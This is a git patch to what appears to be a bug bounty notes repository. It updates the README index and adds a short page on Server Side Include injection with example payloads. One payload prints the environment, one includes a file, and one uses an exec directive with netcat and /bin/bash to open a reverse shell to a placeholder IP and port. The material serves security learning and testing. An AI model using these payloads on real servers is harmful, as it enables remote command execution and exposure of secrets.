From 852c19172f5b80b791abf36aa5fdc309b413e306 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <muhammaddaffa.info@gmail.com>
Date: Wed, 1 Feb 2023 10:22:13 +0700
Subject: [PATCH] feat: added SSI

---
 README.md                        | 18 ++++++++++++------
 Server Side Include Injection.md | 31 +++++++++++++++++++++++++++++++
 2 files changed, 43 insertions(+), 6 deletions(-)
 create mode 100644 Server Side Include Injection.md

diff --git a/README.md b/README.md
index ec167fe..edb8920 100644
--- a/README.md
+++ b/README.md
@@ -18,25 +18,31 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
 - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
 - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md)
-- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
+- [NoSQL Injection (NoSQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
 - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
 - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
 - [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
+- [Server Side Include Injection (SSI Injection)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Include%20Injection.md)
 - [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
-- SQL Injection (SOON)
+- [SQL Injection (SQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/SQL%20Injection.md)
 - [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
 - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
 
-## Checklist
-- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
-- Register Functionality SOON!
-
 ## List Bypass
 - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
 - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
 - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
 - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
 
+## Checklist
+- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
+- Register Functionality SOON!
+
+## CVEs
+- CVEs 2021 (https://github.com/daffainfo/AllAboutBugBounty/blob/master/CVEs/2021)
+- CVEs 2022 (SOON)
+- CVEs 2023 (SOON)
+
 ## Miscellaneous
 - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
 - [Broken Link Hijacking](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Broken%20Link%20Hijacking.md)
diff --git a/Server Side Include Injection.md b/Server Side Include Injection.md
new file mode 100644
index 0000000..1979941
--- /dev/null
+++ b/Server Side Include Injection.md	
@@ -0,0 +1,31 @@
+# Server Side Include Injection (SSI Injection)
+
+## Introduction
+SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
+
+## Where to find
+Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
+
+## How to exploit
+1. Print a date
+```
+<!--#echo var="DATE_LOCAL" -->
+```
+
+2. Print all the variabels
+```
+<!--#printenv -->
+```
+
+3. Include a file
+```
+<!--#include file="includefile.html" -->
+```
+
+4. Doing a reverse shell
+```
+<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
+```
+
+## References
+* [OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
\ No newline at end of file